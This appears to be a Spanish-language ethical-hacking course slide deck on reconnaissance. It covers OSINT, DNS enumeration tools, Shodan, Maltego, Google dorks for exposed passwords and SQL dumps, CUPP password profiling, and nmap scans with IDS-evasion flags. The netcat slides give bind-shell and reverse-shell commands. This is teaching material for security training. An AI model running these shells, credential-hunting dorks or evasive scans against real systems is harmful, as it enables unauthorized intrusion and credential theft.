Ethical Hacking

Reconocimiento
●
Es el primer paso de un pentest o
ataque.
●
Se dice que un atacante dedicará al menos un 75%
de su tiempo en esta fase.
●
Esta fase permite definir – mapear y explorar al
objetivo en busca de vulnerabilidades que
eventualmente nos llevará a la fase de
explotación.
●
El reconocimiento es lo primero que se realiza, de
sus resultados obtendremos una idea de donde
necesitamos más información / punto de ataque.
2
Principios Básicos del
Reconocimiento
●
Existen 2 tipos, Reconocimiento Pasivo y el
Reconocimiento Activo.
●
El reconocimiento pasivo consiste de interacciones
normales.
●
La ip del atacante no siempre es logueada.
●
Es dificil diferenciar las actividades de reconocimiento
pasivo con actividades normales.
●
No suelen relacionarse las actividades de esta fase como
el preludio a un ataque.
●
Se busca información de personas.
3
Principios Básicos del
Reconocimiento
●
El reconocimiento activo consiste
en realizar peticiones directas u
otras interacciones que pudieran
capturar la IP.
●
Se relacionan estas actividades con
actividades maliciosas.

4
Principios Básicos del
Reconocimiento

5
Principios Básicos del
Reconocimiento
●
Footprinting
– Con el Footprinting se obtiene/reuna y
organiza toda la información posible sobre
un objetivo, mientras más información se
obtiene, mayor será la precisión de la
evaluación.

6
 Footprinting
●
Detectar versiones de Sistemas Operativos
●
Nombres de Dominios (Domain Names)
●
Bloques de Red (Network Blocks)
●
Direcciones IP específicas
●
País y Ciudad donde se encuentran los Servidores
●
Información de Contacto (números telefónicos,
emails, etc.)
●
Rango de Red y sub-red (Network Range y subnet
mask)

7
 Footprinting
●
Acertar maquinas o computadoras activas
●
Puertos abiertos y las aplicaciones que estan
corriendo en ellos

8
Identificando al objetivo :
Reconocimiento Pasivo
Reconocimiento Pasivo
●
Consiste, generalmente, en analizar la
información que está disponible abiertamente.
●
La información puede venir del objetivo o de
otras fuentes públicas en línea.
●
Al acceder a esta información no se interactua
directamente con el objetivo.
●
Si se interactua, no se hace de una forma
“inusual” o de una forma que genere una traza.
●
Por todas estas razones es ejecutado al inicio …
Pues el riesgo de detección es bajo.
10
Reconocimiento Pasivo
●
Open Source Intelligence (OSINT)
●
Reconocimiento DNS y mapeo de ruta.
●
Obtener información de los usuarios
●
Perfilando usuarios para generar listas de
contraseñas.
●
¿Quién diseñó el sistema ?

11
OSINT
● Información de fuente abierta.
● Generalmente la recolección de esta data es el
primer paso.
● La mayoría de las organizaciones militares y de
inteligencia se encuentran coleccionando
información sobre sus objetivos haciendo uso de
OSINT.
● La recolección de OSINT es, de por si, un proceso
complejo y pudiera abarcar un libro por si solo.
● The US Army manual ATP 2-22.9
([Link]
[Link]) 12
OSINT
●
La información objetivo depende de cual sea
el objetivo inicial del ataque / pentest.
●
El OSINT usualmente inicia con una revisada
a la presencia online del objetivo.
– Sitios Web.
– Blogs.
– Redes Sociales.
– Repositorios de data públicos.

13
OSINT
●
Información de interés
– Localización geográfica. Oficinas remotas,
aisladas, lejos del nodo central. Poseen menos
controles de seguridad.
– Buscar uniones recientes.
– Nombre de los empleados, información de
contacto, e-mail, números de teléfono.
– Pistas sobre la cultura corporativa.
– Tecnología en uso. Nuevas adquisicionesn
14
OSINT
– Nombres de usuarios de miembros del objetivo.
Pidiendo ayuda online por algún problema.
– Contenido archivado, histórico. Way Back Machine
en [Link]
– Blogs mantenidos por empleados
– Sitios que proveen información de DNS, ruta,
información del servidor. [Link]
– SHODAN, el « google de los hackers »
– Dumpsites como pastebin...
– Motores de búsqueda...
15
 Reconocimiento DNS y
Mapeo de Ruta
● El Domain Name System es una base de
datos distribuida que resuelve nombres a sus
direcciones IP.
● El reconocimiento de DNS consiste en
identificar a quien le pertenece un dominio
en particular o grupode Ips.
● Buscar IP asignadas al objetivo y la ruta entre
el pentester o atacante y el objetivo.
16
 WhoIs
● Lo podemos usar para identificar las
direcciones Ips que están asignadas al sitio
objetivo.
● Dependiendo de la base de datos, la
respuesta del whois varía.
– Nombres
– Dirección Física
– Teléfonos
– Direcciones E-Mail
– Ips
– Nombres de servidores DNS 17
 Reconocimiento de DNS
● Con la información DNS podemos:
– Usar ataques de fuerza bruta para identificar nuevos
dominios asociados con el objetivo.
– Si el servidor DNS permite realizar una transferencia de
zona a cualquier peticionario, hace mucho más facil la labor
de identificar objetivos potenciales. Si el objetivo posee un
IPS o un IDS esto generará con seguridad una alerta.
– DomainKeys Identified Mail (DKIM) y Sender Police
Framwork (SPF), usados para controlar SPAM.
● Son más conscientes sobre la seguridad.
● Quizás no sean un buen objetivo para un ataque de Ing.
Social. 18
 Registros DNS
La información del protocolo DNS se almacena en
registros...
● A Adress, usado para traducir nombres de hosts a una
dirección Ipv4.
● AAAA Address, usado para traducir nombres de hosts a
direcciones Ipv6.
● CNAME Canonical Name, Para crear nombres de hosts
adicionales o alias para los hosts de un dominio.
● NS Name Server. Define la asociación que existe entre
un nombre de dominio y los servidores de nombres que
almacenan la información de dicho dominio.

19
WhoIs
● Puede usarse para apoyar ataques de ingeniería
social.
● Localización para un ataque físico.
● Conducir búsquedas recursivas para localizar otros
dominios localizados en el mismo servidor. Si uno es
vulnerable … Entonces es posible vulnerar al otro.
● En casos en el que el dominio está a punto de expirar,
un atacante podría “capturar” este sitio.
● [Link]
● [Link]
20
 Registros DNS
● SRV Servicios, permite indicar los servicios que ofrece el
dominio.
● HINFO Host Informatio, permite que se conozca el tipo de
máquina, sistema oeprativo que usa.
● TXT Información textual, permite a los dominios identificarse
de forma arbitraria.
● LOC Localización Geográfica
● MX Mail Exchange, asocia un nombre de dominio a una lista
de servidores de correo.
● SPF Sender Police Framework, ayuda a combatir el SPAM,
especifica los host que estan autorizados a enviar un correo
desde un dominio dado.

21
 Reconocimiento DNS
Escaners de DNS
● DNSMAP
● DNSENUM
● DNSRECON
● DIG
● FIERCE

22
 DNSMAP
● -w archivo con lista de palabras
● -r archivo “estándar” con resultados
● -c archivo con resultados en csv
● -d retraso, en milisegundos
● -i Ips a ignorar, usar si se tienen muchos falsos positivos

Ejemplos:
● dnsmap [Link]

● dnsmap [Link] -w [Link] -r

/tmp/domainbf_results.txt
● dnsmap [Link] -r /tmp/ -d 3000

● dnsmap [Link] -r ./domainbf_results.txt

23
 DNSRECON
● -d, --domain Dominio objetivo
● -r, --range Rango de Ips para búsquedas inversas
● -n, --name_server Servidor de Dominio a usar.
● -D, --dictionary Archivo diccionario de subdominios y
hostnames para realizar fuerza bruta
● -t, --type Tipo de enumeracíon a realizar (brt, NS, A,
AAAA, zonewalk)
● -a Intentar una transferencia de zona

24
 DNSRECON
Uso básico
● Dnsrecon -d <dominio>

25
 DNSRECON
Obtener dominios por fuerza bruta
● dnsrecon -d <dominio> -D <archivo> -t brt

26
 DIG
● Uso básico
● Dig <hostname>

● Para especificar un servidor de DNS

● Dig @<nombre servidor dns> <hostname>

● Encontrar los MX
● Dig <hostname> MX

● Encontrar los NS
● Dig <hostname> NS

● Encontrar las anotaciones de texto TXT

● Dig <hostname> TXT

● Encontrar toda la información posible

● Dig <hostname> ANY

27
 FIERCE
● Usado para buscar transferencias de zona
● Si no lo consigue, realiza un ataque de fuerza bruta
● Fierce --dns <objetivo> --threads <numero>

28
 DNSENUM
Opciones básicas
● --Dnsserver Servidor dns para las consultas

● --enum Atajo para usar --threads 5 -s 15 -w

● --Noreverse evitar operaciones de búsqueda inversa

● --private Mostrar y guardar IPs al final del archivo

domain_ips.txt
● --subfile <archivo> Guardar todos los subdominios validos a

este archivo
● -t, --timeout Tiempo de espera en segundos (por defecto 10

segundos)
● --threads Numero de hilos de procesamiento

● -v, --verbose activar la "verbosidad" extra

29
 DNSENUM
Opciones de google scraping
-p, --pages <valor> Numero de paginas de google de donde
se rasparán nombres
-s, --scrap <valor> Numero maximo de subdominios que
serán raspados

30
 DNSENUM
Opciones de fuerza bruta
● -f, --file <archivo> Obtener subdominios de este archivo

● -u, --update <a|g|r|z> Actualizar el archivo especificado

con -f con los subdominios validos

– a Actualizar con todos los resultados
– g Actualizar solo con resultados de raspado de
google
– r Actualizar solo con resultados de búsqueda inversa
– z Actualizar solo con resultados de transferencia de
zona
● -r, --recursion Realizar una búsqueda por fuerza bruta
sobre cada subdominio cn un registro NS 31
 DNSENUM
Opciones del rango de red
● -d, --delay <valor> Número de segundos que esperar

entre búsquedas de whois

● -w, --whois Realizar búsquedas whois en rangos de IP de

clase C
Opciones de salida
● -o, --output <archivo> Salida en formato XML

32
 DNSENUM
Dnsenum -enum <url>

33
 DNSENUM
Enumeración de subdominios por fuerza bruta haciendo
uso de un archivo
● dnsenum –f <file> -r <url>

34
Mapeando la Rutal al Objetivo
● Traceroute

35
Maltego

36
 Maltego
● Para usar maltego, primero es necesario registrarnos en
[Link]
● Luego una vez registrados, iniciamos el Maltego CE y
seleccionamos una de las distintas “máquinas” disponibles:

● Company Stalker: Busca información de correos

● Footprint L1: Obtención de información básica
● Footprint L2: Obtención de información moderada
● Footprint L3: Obtención de información intensa

● Selección del objetivo

37
Maltego

38
 The Harvester
● -d Dominio en el que buscaremos
● -b Identifica la fuente de donde se extraerá
la información: Bing,
BingAPI,Google,Google-
Profiles,Jigsaw,LinkedIn,People123,PGP o All
● -l Limite para terminar la búsqueda
theharvester.
● -f Para guardar resultados al final en HTML y
XML 39
The Harvester

40
Netcraft

41
 Sitios de pastes
● Los sitios de pastes son aplicaciones web que permiten
subir texto plano
● Nacen debido a la necesidad en canales IRC o foros
relacionados con programación donde transferir grandes
cantidades de texto es mala idea
● Estos sitios son usados para postear textos de forma
anónima, por lo que son populares en la comunidad hacker
● Podemos encontrar toda clase de información ... Desde
actividad política a números de tarjetas de crédito o
usuarios con contraseñas.
● En algunos podemos subscribirnos a un determinado
número de palabras clave
● Algunos pastes pueden pedir autorización con una clave
para ser vistos o tener una duración limitada.
42
Pastebin

43
 Otros sitios de pastes ...
● NoPaste
● SameText

● ClibBoard

● Hackology Paste

● Hastebin

44
 Have i been pwned ?
● Es una base de datos online de nombres de usuario y
sus constraseñas
● La información que se encuentra en este sitio se obtuvo
a través de la divulgación de contraseñas en grandes
ataques
● Muchas veces los usuarios suelen reusar sus
contraseñas ...

45
Have i been pwned ?

46
 Buscando vulnerabilidades
publicadas para un software
● [Link]

47
 Buscando vulnerabilidades
publicadas para un software
● [Link]

48
 Buscando vulnerabilidades
publicadas para un software
● [Link]

49
 SHODAN
● Shodan es un motor de búsqueda para
encontrar dispositivos específicos que existen
en linea.
● Lo más popular son búsquedas relacionadas
con webcams, linksys, cisco, netgear …
● Funciona escaneando la internet y
obteniendo los banners de las aplicaciones
(banner grabing).

50
 SHODAN
Para usar el buscador ...
● City Dispositivos en una ciudad en particular.
● Country Dispositivos en un país en particular.
● Geo Coordenadas
● Hostname nombre del host
● Net Buscar una IP o un rango de Ips /x
● Os Buscar un sistema oeprativo
● Port Dispositivos con este puerto abierto
51
 SHODAN
Para usar el buscador ...
● Before/after Encontrar resultados dentro de
un periodo de tiempo
● Ejemplos
– Apache city: “Caracas”
– Nginx country: “VE”
– Cisco net: “[Link]/24”
– Port: 445 country: “VE”
52
 Google Hacking
● Técnica que hace uso de los filtros en el buscador de
google para filtrar información en búsqueda de
vulnerabilidades.

53
 Google Hacking
●
“” (comillas) Usadas para buscar una frase exacta
●
And, or, not (operadores lógicos de “y” o “no”)
●
+ y – (incluir y excluir)
●
* (asterisco) es un comodinm cualquier palabra pero solo una
palabra
●
. (punto) es un comodín, cualquier palabra, una o muchas
●
Intitle o allintitle buscar en el titulo de la pagina
●
Inurl o allinurl buscar en la URL
●
Site Buscar en un determinado sitio

54
Google Hacking
●
Filetype busqueda de archivos
●
Link solo busca paginas que tienen vinculos a una determinada
web
●
Intext busqueda de texto

55
 Google Hacking
●
Ficheros con usuarios u contraseñas
– ext:pwd inurl:(service | authors | administrators | users)
“# -FrontPage-“
●
Dumps de bases de datos
– filetype:sql “# dumping data for table” “`PASSWORD`
varchar”
●
Busca un listado de directorios que contenga un archivo
llamado [Link]
– intitle:”index of” “Index of /” [Link]
●
Más contraseñas para bases de datos
– filetype:inc intext:mysql_connect password -please
-could -port 56
 Google Hacking
●
Dumps de MySQL con contraseñas
– filetype:sql “MySQL dump” (pass|password|passwd|
pwd)
●
Instalaciones de php nuke sin terminar
– “there are no administrators accounts yet” “create the
Super User”
●
Buscando formularios de acceso
– “You have requested access to a restricted area of our
website. Please authenticate yourself to continue.”
●
Buscar sitios haciendo uso de webmin
– inurl:”:10000″ webmin
57
 Google Hacking
●
Más instalaciones de php nuke a medio camino
– “best idea is to create the super user” “now by clicking
here”
●
Formularios de login de wordpress o joomla
– Inurl : (/wp-admin | /administrator)
●
Versión antigua y vulnerable de Mercury Board
– “Powered by MercuryBoard [v1”
●
Webcams linksys
– camera linksys inurl:[Link]

58
 Google Hacking
●
Impresoras listas para administrar remotamente
– inurl:webarch/[Link]
●
Más impresoras …
– intitle:”network print server”

59
 Google Hacking Database
●
Impresoras listas para administrar remotamente
– inurl:webarch/[Link]
●
Más impresoras …
– intitle:”network print server”

60
 Perfilando Usuarios para Listas
de Contraseñas
● Podemos usar CUPP, Common User Password
Profiler.
● git clone [Link]
● Python [Link] -i , para ejecutarlo en modo
interactivo.

61
CUPP

62
RECON-NG

63
 RECON-NG
● Es un framework para el reconocimiento
● Su uso es similar al Metasploit
● Para ver los comandos usamos help

64
 RECON-NG
● Con show modules podemos ver que módulos se encuentran
cargados

65
 RECON-NG
● Recon-ng puede usar las API de varias aplicaciones, podemos
ver esta lista si usamos el comando keys list
● Podriamos agregar claves de esta forma:
● keys add facebook_api 123456

66
●
RECON-NG
Probemos algún modulo de Recon-ng sin APIs, usemos el
modulo xssposed que buscará vulnerabilidades de cross site
scripting para un dominio dado
● use recon/domains-vulnerabilities/xssposed

67
●
RECON-NG
Solamente tenemos una opción para configurar, y esta es
SOURCE, así que la configuraremos de esta forma:
● set source [Link]

68
●
RECON-NG
Ahora solo hace falta escribir run para ejecutar el módulo...

69
Identificando al objetivo :
Reconocimiento Activo
 Reconocimiento activo
● Suele construirse sobre las bases del reconocimiento
pasivo
● Usado para exponer completamente la superficie de
ataque del objetivo
● Produce más información. A su vez, esta información es
de mayor utilidad
● Pero ... Mientras más usable sea la data, mayor es el
riesgo de detección

71
Reconocimiento Activo

72
 Banner grabbing
● El Banner Grabbing es una técnica utilizada para extraer
información de los banners que ofrecen los servicios y
que revelan el tipo y versión del software utilizado.

73
Banner grabbing
Obteniendo el banner del servidor con telnet

74
Banner grabbing
Obteniendo el banner del servidor con telnet

75
Banner grabbing
Los servidores responden de formas distintas,
diferenciando uno de otro en cosas “minimas”

76
Banner grabbing
Los servidores responden de formas distintas,
diferenciando uno de otro en cosas “minimas”

77
Banner grabbing
No todos los banners son legítimos, es posible crear
un banner falso ...

78
 Escaneo de Puertos
● Detecta si un puerto está abierto, cerrado, o protegido
por un cortafuegos.
● Se utiliza para detectar qué servicios comunes está
ofreciendo la máquina y posibles vulnerabilidades de
seguridad según los puertos abiertos.
● En algunos casos se puede llegar a detectar el sistema
operativo que está ejecutando la máquina según los
puertos que tiene abiertos.
● Existen varios programas para escanear puertos por la
red. Uno de los más conocidos es Nmap, disponible
tanto para Linux como Windows.
79
 Network Mapper : NMAP
● Nace como un mapper de redes.
● Es posiblemente el escaner de puertos más popular hoy
en dia
● Posee nuevas funcionalidades para apoyar en el
escaneo de vulnerabilidades gracias al “NSE” (Nmap
Scripting Engine).

80
 NMAP
● Nmap [Link]
● Nmap -p 80 [Link]
● Nmap -iL [Link]
● nmap -sV [Link]
● nmap -p 25,80,1000-4000 [Link]

81
 NMAP
● Generando reportes con NMAP
-oN <archivo> Salida normal
-oX <archivo> salida XML
-oS <archivo> SaLiDa ScRipT Kidd|3
-oG <archivo> Salida «grepeable»
-oA <nombre_base_archivo> Salida en todos los formatos

nmap -sV -T4 -O -F --version-light [Link]/25 -oX

servicios_red.xml

82
 NMAP
Ejemplo de comando “sigiloso” de NMAP
● nmap --spoof-mac- Cisco --data-length 24 –T paranoid –
max-hostgroup 1 – max-parallelism 10 -PN -f –D
[Link],RND:5,ME --v –n –sS –sV–oA
/desktop/pentest/nmap/out –p T:1-1024 –random-hosts
[Link] [Link]

83
 NMAP
● --spoof-mac-Cisco Spoofea una MAC de Cisco,
Reemplazando el Cisco con un 0 creamos una MAC
completamente aleatoria.
● --data-length 24 Agrega 24 bytes aleatorios a la mayoría
de los paquetes que se envia.
● -T “paranoid” Pone el tiempo a su menor opción.
● --max-hostgroup Limita los hosts que son escaneados a
la vez.
● --max-parallelism Limita el número de hilos de
ejecución.
● -PN No realizar ping en el objetivo
84
 NMAP
● -f Fragmenta los paquetes, busca engañar a los IDS/IPS
● -D [Link], RND:5,ME: Crea escaneos de señuelo para
ocultar el verdadero escaneo.
● -n No realizar resolución DNS.
● -sS Conduce un escaneo sigiloso TCP SYN, no completa el
handshake TCP.
● -sV Detección de versiones
● -oA Resultados en todos los formatos.
● -p T:1-1024: Especifica los puertos TCP a ser escaneados.
● --random-hosts Aleatoriza el orden en que se analizan los
hosts objetivo.

85
 NMAP NSE
● NMAP Scripting Engine
– Permite ejecutar scripts para diversas tareas.
– Detección de versiones más sofisticada.
– Detección de vulnerabilidades
– Detección de backdoors
– Explotación de vulnerabilidades
● El NSE se activa solo con los scripts más comunes con la
opción -sC.
● --script para seleccionar un script específico.
● --script-help tendremos una descripción de que hace
cada script que seleccionemos.
86
 NMAP NSE
● Los Scripts se clasifican en:
– Auth: Lidian con la autenticación (o evasión de
esta).
– Broadcast: Tipicamente usados para descubrir
hosts, en conjunto con el argumento newtargets
los scripts añaden los hosts descubiertos a la cola
de escaneo.
– Brute: Usan ataques de fuerza bruta para ganar
acceso a los servidores remotos.
– Default: Scripts que se ejecutan por defecto con la
opción -sC.
87
 NMAP NSE
● Los Scripts se clasifican en:
– Discovery: Usados para descubrir información extra
sobre la red.
– DOS: Usados para causar denegaciones de servicios
– Exploit: Scripts que buscan explotar alguna
vulnerabilidad.
– External: Establecen contacto con otros recursos en
la red, como por ejemplo, obtener información
sobre un dominio usando whoIs.
– Fuzzer: Scripts diseñados para enviar campos
inesperados o aleatorios en cada paquete.
88
 NMAP NSE
● Los Scripts se clasifican en:
– Intrusive: scripts no seguros, podrian generar un
crash en alguna aplicación del objetivo, usar
muchos recursos de este o ser percibidos como
maliciosos.
– Malware: realizan pruebas sobre el objetivo para
conocer si están infectados.
– Safe: Scripts considerados como seguros, no
generan un crash en el objetivo.
– Version: Son una extensión de la función de
detección de versiones, solo funcionan en conjunto
con -sV 89
 NMAP NSE
● Los Scripts se clasifican en:
– Vuln: Usados para encontrar vulnerabilidades
específicas.

90
 NMAP NSE
● Uso básico
– --script <archivo>|<categoria>|<directorio>
● Para la ayuda usamos --script-help <archivo>|
<categoria>|<directorio>
● Nmap --script-help discovery
● Nmap --script-help discovery and vuln
● Nmap –script-help “smtp-*”
● Nmap--script-help “ftp-*” and intrusive

91
 NMAP NSE
● Nmap --script vuln x.x.x.x
● Nmap --script brute x.x.x.x/24
● nmap -p 80 --script [Link] x.x.x.x
● nmap --script http-enum x.x.x.x
● nmap -p 445 --script smb-os-discovery x.x.x.x
● nmap -p 443--script ssl-heartbleed x.x.x.x

92
 NetCat
● Es una herramienta potente y flexible en el campo de
las redes.
● Si bien es capaz de muchas cosas, sus funciones
primordiales son:
– Crear un socket con el destino que se indique si
hace de cliente, o en el puerto indicado si hace de
servidor.
– Enviar/recibir por la salida/entrada estándar todo lo
que pase por el socket.

93
 NetCat
● Su sintaxis básica es:
– Nc [-opciones] host [puerto]
– Nc -l -p puerto [-opciones]
● Parámetros básicos
– -l: Modo en escucha, espera conexiones entrantes.
– -p: Puerto local
– -u: Modo UDP
– -e: Ejecuta el comando dado después de conectar.
– -c: Ejecuta ordenes de shell (/bin/sh -c [comando]).
– -z: No conectarse. Envia paquetes “nulos”.
– -v: Verboso
– -n: No realizar resolución DNS 94
 NetCat
● Escaner de Puertos
– nc -n -v -z [Link] 1-1000
● Creando un Chat (en ambas computadoras):
– Servidor
● nc -lvp 2000
– Cliente
● Nc -v x.x.x.x 2000

95
 NetCat
● Transmisión de archivos
– Receptor
● nc -lvp 3500 > prueba_nc.txt
– Emisor
● nc -v host 3500 < [Link]
● Servidor daytime
– Servidor
● nc -lvp 2000 -e /bin/date
– Cliente
● nc -v host 2000
96
 NetCat
● Shell Remota
– Servidor (pc comprometida)
● Nc -lvp 2000 -e /bin/sh
– Cliente
● Nc -v host 2000
● Shell Reverso
– Servidor
● Nc -lvp 2000
– Cliente (pc comprometida)
● Nc -v host 2000 -e /bin/bash
97
 NetCat
● Petición HTTP
– nc [Link] 80
– GET / HTTP/1.1
– Host: [Link]
● nc [Link] 23

98
 WhatWeb
● Escaner usado para realizar fingerprinting
● [Link]
● Opciones comunes
– -a: Nivel del agresión, del 1 al 4.
– --user-agent: Para identificarse con otro user agent.
– -v: Incrementar verbosidad
● Ejemplos
– whatweb [Link]
– whatweb -v [Link]
– whatweb -a 3 [Link]
– whatweb [Link]/24 99
 Escaners de Vulnerabilidades
● Suelen tener muchos inconvenientes
– Solo detectan firmas conocidas.
– No suelen determinar si una vulnerabilidad
puede o no puede ser explotada.
– Alta incidencia de falsos positivos.
– No suelen simular ataques “encadenados”
ejecutados por los atacantes.
– A su favor tienen que por su alto nivel de
intrusividad suelen obtener mucha
información.

100
 Escaners de Vulnerabilidades
● Nikto
– Es bastante limitado
– Nikto -h x.x.x.x

101
 Escaners de Vulnerabilidades
● Sugraph Vega

102
 Escaners de Vulnerabilidades
● Acunetix

103
 Escaners de Vulnerabilidades
● OWASP Zap

104
 Escáneres Específicos a Ciertas
Aplicaciones Web
● WpScan
– Escanea páginas de wordpress.
– Escaneo Normal
● wpscan --url [Link]
– Enumera plugins
● wpscan --url [Link] --enumerate p
– Enumera Themes
● wpscan --url [Link] --enumerate t
– Enumera Usuarios
● wpscan --url [Link] –enumerate u 105
 Escáneres Específicos a Ciertas
Aplicaciones Web
● JoomScan
– Escanea páginas de Joomla
● Joomscan -u [Link]

106